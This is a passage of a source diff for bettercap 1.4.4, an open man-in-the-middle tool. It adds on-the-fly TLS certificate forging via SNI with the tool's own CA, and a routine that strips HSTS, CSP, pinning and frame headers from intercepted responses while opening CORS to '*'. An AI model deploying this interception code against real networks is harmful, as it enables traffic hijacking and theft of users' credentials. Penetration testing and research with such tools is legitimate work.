+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module SSL
+
+# Little utility class to handle SSLServer creation.
+class Server
+  # The SSL certification authority.
+  attr_reader :authority
+  # Main SSLContext instance.
+  attr_reader :context
+  # Socket I/O object.
+  attr_reader :io
+
+  # Create an instance from the TCPSocket +socket+.
+  def initialize( socket )
+    @authority    = Context.get.authority
+    @context      = OpenSSL::SSL::SSLContext.new
+    @context.cert = @authority.certificate
+    @context.key  = @authority.key
+
+    # If the client supports SNI ( https://en.wikipedia.org/wiki/Server_Name_Indication )
+    # we'll receive the hostname it wants to connect to in this callback.
+    # Use the CA we already have loaded ( or generated ) to sign a new
+    # certificate at runtime with the correct 'Common Name' and create a new SSL
+    # context with it, these are the steps:
+    #
+    # 1. Get hostname from SNI.
+    # 2. Fetch upstream certificate from the real server.
+    # 3. Resign it with our own CA.
+    # 4. Create a new context with the new spoofed certificate.
+    # 5. Profit ^_^
+    @context.servername_cb = proc { |sslsocket, hostname|
+      Logger.debug "[#{'SSL'.green}] Server-Name-Indication for '#{hostname}'"
+
+      ctx      = OpenSSL::SSL::SSLContext.new
+      ctx.cert = @authority.spoof( hostname )
+      ctx.key  = @authority.key
+
+      ctx
+    }
+
+    @io = OpenSSL::SSL::SSLServer.new( socket, @context )
+  end
+end
+
+end
+end
+end

data/lib/bettercap/proxy/stream_logger.rb

@@ -10,9 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'zlib'
-require 'stringio'
-require 'json'
 
 module BetterCap
 # Raw or http streams pretty logging.

data/lib/bettercap/proxy/streamer.rb

@@ -10,22 +10,21 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/logger'
 
 module BetterCap
 module Proxy
 # Handle data streaming between clients and servers for the BetterCap::Proxy::Proxy.
 class Streamer
   # Initialize the class with the given +processor+ routine.
-  def initialize( processor )
+  def initialize( processor, sslstrip )
     @processor = processor
     @ctx       = Context.get
-    @sslstrip  = SSLStrip::Strip.new( @ctx ) if @ctx.options.sslstrip
+    @sslstrip  = SSLStrip::Strip.new( @ctx ) if sslstrip
   end
 
   # Return true if the +request+ was stripped.
   def was_stripped?(request, client)
-    if @ctx.options.sslstrip
+    if @sslstrip
       request.client, _ = get_client_details( client )
       return @sslstrip.was_stripped?(request)
     end
@@ -50,7 +49,7 @@ class Streamer
 
     begin
       r = nil
-      if @ctx.options.sslstrip
+      if @sslstrip
         r = @sslstrip.preprocess( request )
       end
 
@@ -69,7 +68,7 @@ class Streamer
         Logger.debug "[#{request.client}] -> #{request.to_url} [#{response.code}]"
       end
 
-      if @ctx.options.sslstrip
+      if @sslstrip
         # do we need to retry the request?
         if @sslstrip.process( request, response ) == true
           # https redirect loop?
@@ -81,6 +80,9 @@ class Streamer
         end
       end
 
+      # Strip out a few security headers.
+      strip_security( response )
+
       # call modules on_request
       @processor.call( request, response )
 
@@ -93,6 +95,34 @@ class Streamer
 
   private
 
+  # List of security headers to remove/patch from any response.
+  # Thanks to Mazin Ahmed ( @mazen160 )
+  SECURITY_HEADERS = {
+    'X-Frame-Options'                     => nil,
+    'X-Content-Type-Options'              => nil,
+    'Strict-Transport-Security'           => nil,
+    'X-WebKit-CSP'                        => nil,
+    'Public-Key-Pins'                     => nil,
+    'Public-Key-Pins-Report-Only'         => nil,
+    'X-Content-Security-Policy'           => nil,
+    'Content-Security-Policy-Report-Only' => nil,
+    'Content-Security-Policy'             => nil,
+    'X-Download-Options'                  => nil,
+    'X-Permitted-Cross-Domain-Policies'   => nil,
+    'Allow-Access-From-Same-Origin'       => '*',
+    'Access-Control-Allow-Origin'         => '*',
+    'Access-Control-Allow-Methods'        => '*',
+    'Access-Control-Allow-Headers'        => '*',
+    'X-Xss-Protection'                    => '0'
+  }.freeze
+
+  # Strip out a few security headers from +response+.
+  def strip_security( response )
+    SECURITY_HEADERS.each do |name,value|
+      response[name] = value
+    end
+  end
+
   # Return the +client+ ip address and port.
   def get_client_details( client )
     _, client_port, _, client_ip = client.peeraddr

data/lib/bettercap/proxy/thread_pool.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'thread'
 
 module BetterCap
 module Proxy

data/lib/bettercap/shell.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/error'
 
 module BetterCap
 # Class responsible of executing various shell commands.

data/lib/bettercap/sniffer/parsers/httpauth.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'base64'
 
 module BetterCap
 module Parsers

data/lib/bettercap/sniffer/parsers/https.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'resolv'
 
 module BetterCap
 module Parsers

data/lib/bettercap/sniffer/sniffer.rb

@@ -10,9 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/logger'
-require 'colorize'
-require 'packetfu'
 
 module BetterCap
 # Class responsible of loading BetterCap::Parsers instances and performing

data/lib/bettercap/spoofers/arp.rb

@@ -10,7 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/spoofers/base'
 
 module BetterCap
 module Spoofers
@@ -81,7 +80,7 @@ class Arp < Base
 
     @ctx.targets.each do |target|
       unless target.ip.nil? or target.mac.nil?
-        5.times do 
+        5.times do
           spoof(target)
           sleep 0.3
         end

data/lib/bettercap/spoofers/icmp.rb

@@ -10,9 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/spoofers/base'
-require 'net/dns'
-require 'resolv'
 
 module BetterCap
 module Spoofers

data/lib/bettercap/spoofers/none.rb

@@ -10,8 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/spoofers/base'
-require 'bettercap/logger'
 
 module BetterCap
 module Spoofers

data/lib/bettercap/update_checker.rb

@@ -10,11 +10,6 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
-require 'bettercap/version'
-require 'bettercap/error'
-require 'bettercap/logger'
-require 'net/http'
-require 'json'
 
 module BetterCap
 # This class is responsible for fetching the latest version of

data/lib/bettercap/version.rb

@@ -12,7 +12,7 @@ This project is released under the GPL 3 license.
 =end
 module BetterCap
   # Current version of bettercap.
-  VERSION = '1.4.3'
+  VERSION = '1.4.4'
   # Program banner.
   BANNER = File.read( File.dirname(__FILE__) + '/banner' ).gsub( '#VERSION#', "v#{VERSION}")
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: bettercap
 version: !ruby/object:Gem::Version
-  version: 1.4.3
+  version: 1.4.4
 platform: ruby
 authors:
 - Simone Margaritelli
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2016-02-22 00:00:00.000000000 Z
+date: 2016-02-24 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -134,7 +134,9 @@ files:
 - lib/bettercap/loader.rb
 - lib/bettercap/logger.rb
 - lib/bettercap/monkey/celluloid/io/udp_socket.rb
+- lib/bettercap/monkey/openssl/server.rb
 - lib/bettercap/monkey/packetfu/utils.rb
+- lib/bettercap/monkey/system.rb
 - lib/bettercap/network/arp_reader.rb
 - lib/bettercap/network/hw-prefixes
 - lib/bettercap/network/network.rb
@@ -150,7 +152,6 @@ files:
 - lib/bettercap/network/target.rb
 - lib/bettercap/network/validator.rb
 - lib/bettercap/options.rb
-- lib/bettercap/proxy/certstore.rb
 - lib/bettercap/proxy/module.rb
 - lib/bettercap/proxy/modules/injectcss.rb
 - lib/bettercap/proxy/modules/injecthtml.rb
@@ -158,6 +159,9 @@ files:
 - lib/bettercap/proxy/proxy.rb
 - lib/bettercap/proxy/request.rb
 - lib/bettercap/proxy/response.rb
+- lib/bettercap/proxy/ssl/authority.rb
+- lib/bettercap/proxy/ssl/bettercap-ca.pem
+- lib/bettercap/proxy/ssl/server.rb
 - lib/bettercap/proxy/sslstrip/cookiemonitor.rb
 - lib/bettercap/proxy/sslstrip/lock.ico
 - lib/bettercap/proxy/sslstrip/strip.rb

data/lib/bettercap/proxy/certstore.rb

@@ -1,75 +0,0 @@
-# encoding: UTF-8
-=begin
-
-BETTERCAP
-
-Author : Simone 'evilsocket' Margaritelli
-Email  : evilsocket@gmail.com
-Blog   : http://www.evilsocket.net/
-
-This project is released under the GPL 3 license.
-
-=end
-require 'bettercap/logger'
-require 'openssl'
-
-module BetterCap
-module Proxy
-# Class responsible of handling digital certificate loading or on the fly
-# creation.
-class CertStore
-  @@selfsigned = {}
-  @@frompems = {}
-
-  # Load a certificate from the +filename+ file and return an
-  # OpenSSL::X509::Certificate instance for it.
-  def self.from_file( filename )
-    unless @@frompems.has_key? filename
-      Logger.info "Loading self signed HTTPS certificate from '#{filename}' ..."
-
-      pem = File.read filename
-
-      @@frompems[filename] = { :cert => OpenSSL::X509::Certificate.new(pem), :key => OpenSSL::PKey::RSA.new(pem) }
-    end
-
-    @@frompems[filename]
-  end
-
-  # Create a self signed digital certificate using the specified +subject+ string.
-  # Will return a OpenSSL::X509::Certificate instance.
-  def self.get_selfsigned( subject = '/C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com' )
-    unless @@selfsigned.has_key? subject
-      Logger.info "Generating self signed HTTPS certificate for subject '#{subject}' ..."
-
-      key = OpenSSL::PKey::RSA.new(2048)
-      public_key = key.public_key
-
-      cert = OpenSSL::X509::Certificate.new
-      cert.subject = cert.issuer = OpenSSL::X509::Name.parse(subject)
-      cert.not_before = Time.now
-      cert.not_after = Time.now + 365 * 24 * 60 * 60
-      cert.public_key = public_key
-      cert.serial = 0x0
-      cert.version = 2
-
-      ef = OpenSSL::X509::ExtensionFactory.new
-      ef.subject_certificate = cert
-      ef.issuer_certificate = cert
-      cert.extensions = [
-          ef.create_extension("basicConstraints","CA:TRUE", true),
-          ef.create_extension("subjectKeyIdentifier", "hash"),
-          ef.create_extension("keyUsage", "cRLSign,keyCertSign", true),
-      ]
-      cert.add_extension ef.create_extension("authorityKeyIdentifier",
-                                             "keyid:always,issuer:always")
-
-      cert.sign key, OpenSSL::Digest::SHA256.new
-
-      @@selfsigned[subject] = { :cert => cert, :key => key }
-    end
-
-    @@selfsigned[subject]
-  end
-end
-end
-end